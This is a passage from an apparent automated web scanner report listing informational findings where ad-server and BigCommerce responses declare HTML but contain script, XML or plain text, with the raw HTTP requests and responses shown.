Cookie: Opt=out; T=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 06 Sep 2011 14:57:09 GMT
Content-Length: 2786

document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3E%0Afunction%20pr_swfver%28%29%7B%0Avar%20osf%2Cosfd%2Ci%2Caxo%3D1%2Cv%3D0%2Cnv%3Dnavigator%3B%0Aif%28nv.plugins%26%26nv.mimeTypes.le
...[SNIP]...

31.4. https://account.bigcommerce.com/mailer/form.php

Summary

Severity:   Information
Confidence:   Firm
Host:   https://account.bigcommerce.com
Path:   /mailer/form.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset="UTF-8"

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /mailer/form.php HTTP/1.1
Host: account.bigcommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:05:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 13

Invalid Form.

31.5. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Tue, 06 Sep 2011 17:05:43 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

31.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/4787978?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:05:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 15:05:34 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1144

   function wsod_tag() {
       document.write('<style type="text/css">\n    a#wsoB{color:black;text-decoration:none;text-shadow: 1px 1px 2px white;}\n    a#wsoB:hover{color:black;text-decoration:underline;text-sh
...[SNIP]...

31.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7865964?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:10:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L; expires=Fri, 07-Oct-2011 15:10:44 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 751

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

31.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/5914301?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:16:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2; expires=Fri, 07-Oct-2011 15:15:54 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1144

   function wsod_tag() {
       document.write('<style type="text/css">\n    a#wsoB{color:black;text-decoration:none;text-shadow: 1px 1px 2px white;}\n    a#wsoB:hover{color:black;text-decoration:underline;text-sh
...[SNIP]...

31.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/6673089?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:21:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2; expires=Fri, 07-Oct-2011 15:21:04 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" t
...[SNIP]...

31.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/6546395?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:26:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2; expires=Fri, 07-Oct-2011 15:26:13 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 747

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

31.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7828836?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:31:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2; expires=Fri, 07-Oct-2011 15:31:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 751

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

31.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7171989?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:36:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2; expires=Fri, 07-Oct-2011 15:36:28 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

31.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/600712?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:41:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2; expires=Fri, 07-Oct-2011 15:41:36 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

31.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7161072?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:46:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2; expires=Fri, 07-Oct-2011 15:46:45 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1144

   function wsod_tag() {
       document.write('<style type="text/css">\n    a#wsoB{color:black;text-decoration:none;text-shadow: 1px 1px 2px white;}\n    a#wsoB:hover{color:black;text-decoration:underline;text-sh
...[SNIP]...

31.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/409603?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:51:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2; expires=Fri, 07-Oct-2011 15:51:53 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 753

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

31.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/719556?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:57:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2; expires=Fri, 07-Oct-2011 15:57:04 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 766

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

31.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/2609121?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
